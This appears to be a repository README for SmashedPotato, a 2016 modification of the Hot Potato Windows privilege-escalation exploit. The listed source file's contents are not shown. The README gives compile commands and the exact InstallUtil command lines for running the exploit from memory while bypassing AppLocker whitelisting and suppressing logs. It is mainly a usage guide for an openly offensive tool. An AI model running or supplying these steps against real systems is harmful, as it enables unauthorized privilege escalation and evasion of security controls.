├── README.md
└── SmashedPotato.cs


/README.md:
--------------------------------------------------------------------------------
 1 | # SmashedPotato
 2 | By Cn33liz 2016
 3 | 
 4 | A modification of @breenmachine original Hot Potato Priv Esc Exploit
 5 | 
 6 | ### Mofifications:
 7 | 
 8 | * Merged all .NET assemblies into a single assembly and Compressed this into a Byte[] array.
 9 | * Runs Potato assembly from Memory.
10 | * Included the InstallUtil AppLocker Bypass method (Credits @SubTee).
11 | * Made some Automation.
12 | 
13 | To Compile as x86 binary:
14 | 
15 | ```
16 | cd \Windows\Microsoft.NET\Framework\v4.0.30319
17 | 
18 | csc.exe  /out:"C:\Utils\SmashedPotatoX86.exe" /platform:x86 "C:\Utils\SmashedPotato.cs"
19 | ```
20 | 
21 | To Compile as x64 binary:
22 | 
23 | ```
24 | cd \Windows\Microsoft.NET\Framework64\v4.0.30319
25 | 
26 | csc.exe  /out:"C:\Utils\SmashedPotatoX64.exe" /platform:x64 "C:\Utils\SmashedPotato.cs"
27 | ```
28 | 
29 | To run as x86 binary and bypass Applocker (Credits for this great bypass go to Casey Smith aka subTee):
30 | 
31 | ```
32 | cd \Windows\Microsoft.NET\Framework\v4.0.30319
33 | 
34 | InstallUtil.exe /logfile= /LogToConsole=false /U C:\Utils\SmashedPotatoX86.exe
35 | ```
36 | 
37 | To run as x64 binary and bypass Applocker:
38 | 
39 | ```
40 | cd \Windows\Microsoft.NET\Framework64\v4.0.30319
41 | 
42 | InstallUtil.exe /logfile= /LogToConsole=false /U C:\Utils\SmashedPotatoX64.exe
43 | ```
44 | 
45 | ### Shout-outs:
46 | 
47 | Go out to @breenmachine/@foxglovesec for their magnificent Potato code and @SubTee for his App Whitelisting techniques. 
48 | 


--------------------------------------------------------------------------------